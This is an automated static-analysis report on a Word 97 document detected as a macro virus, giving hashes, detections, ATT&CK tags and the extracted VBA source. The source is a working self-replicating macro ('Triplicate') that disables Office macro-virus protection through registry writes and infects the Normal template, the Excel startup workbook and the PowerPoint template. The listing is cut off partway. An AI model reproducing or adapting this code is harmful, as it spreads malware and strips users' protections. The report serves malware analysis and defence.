Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0f041bf3332207dc…

MALICIOUS

Office (OLE)

26.5 KB Created: 1999-06-08 21:30:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: c30e7698445ecff284591dc2c0ae9c37 SHA-1: 8c0a67a8819e8c9095e4c4020f2a679eb50ce62f SHA-256: 0f041bf3332207dc0c1100cf80e495e04c00b03a4bc4518bf988bd0396c16ec0
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros that utilize CreateObject and GetObject, indicative of attempts to manipulate the Office application or load external components. The ClamAV detections 'Doc.Trojan.Yoda-1' and 'Doc.Trojan.Tristate-1' strongly suggest malicious intent. The Document_Close subroutine appears to be designed to download and execute a second-stage payload, although the exact URL or mechanism is obfuscated.

Heuristics 4

  • ClamAV: Doc.Trojan.Yoda-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Yoda-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5855 bytes
SHA-256: d99713ad246d624590345e1a72ff9462cc1b3870adf54519f6c930550d9b1406
Detection
ClamAV: Doc.Trojan.Tristate-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
'QXYZ
Dim linex As New Collection
On Error Resume Next
If MacroContainer Is NormalTemplate Then
Set t = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
ElseIf MacroContainer Is ActiveDocument Then
Set t = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
Else
t = ""
End If
If t <> "" And Not isme Then
isme = False: For i = 1 To t.CountOfLines: If t.lines(i, 1) = "'QXYZ" Then isme = True
Next
f = 0: i = 1
While f <> 2 And i <= t.CountOfLines
If t.lines(i, 1) = "Private Sub Document_Close()" Then f = 1
If f = 1 And t.lines(i, 1) = "End Sub" Then t.DeleteLines i, 1: i = i - 1: f = False: f = 2
If f = 1 Then t.DeleteLines i, 1: i = i - 1
i = i + 1
Wend
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
linex.Add CStr(MacroContainer.VBProject.VBComponents.Item(1).CodeModule.lines(i, 1)), "L" & i
Next
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
t.InsertLines i, linex("L" & i)
Next
End If
End Sub

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--1nternal-->
'Triplicate v0.21 /1nternal
Private Sub Document_Close()
    On Error Resume Next
    Options.VirusProtection = False
    Options.ConfirmConversions = False
    Options.SaveNormalPrompt = False
    Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
    Set TT = Templates(1).VBProject.VBComponents(1).CodeModule
    Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
    If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
        AD.DeleteLines 1, AD.CountofLines
        AD.InsertLines 1, TT.Lines(1, TT.CountofLines)
        If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
            AD.InsertLines 1, NT.Lines(1, NT.CountofLines)
        End If
    End If
    If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
        NT.DeleteLines 1, NT.CountofLines
        NT.InsertLines 1, AD.Lines(1, AD.CountofLines)
        Set xlApp = CreateObject("Excel.Application")
        If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
            System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Check"
            System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
            System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Whoa"
            Set Book1Obj = xlApp.Workbooks.Add
            Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, NT.Lines(1, NT.CountofLines)
            Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
            Book1Obj.Close
        End If
        xlApp.Quit
        Set PPObj = CreateObject("PowerPoint.Application")
        Set PBT = PPObj.Presentations.Open(Application.Path + "\..\Templates\Blank Presentation.pot", , , msoFalse)
        For Each ModComponent In PBT.VBProject.VBComponents
            If ModComponent.Name = "Triplicate" Then dontadd = True
        Next
        If dontadd <> True Then
            System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
            System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\8.0\New User Settings\PowerPoint\Options", "MacroVirusProtection") = ""
            System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.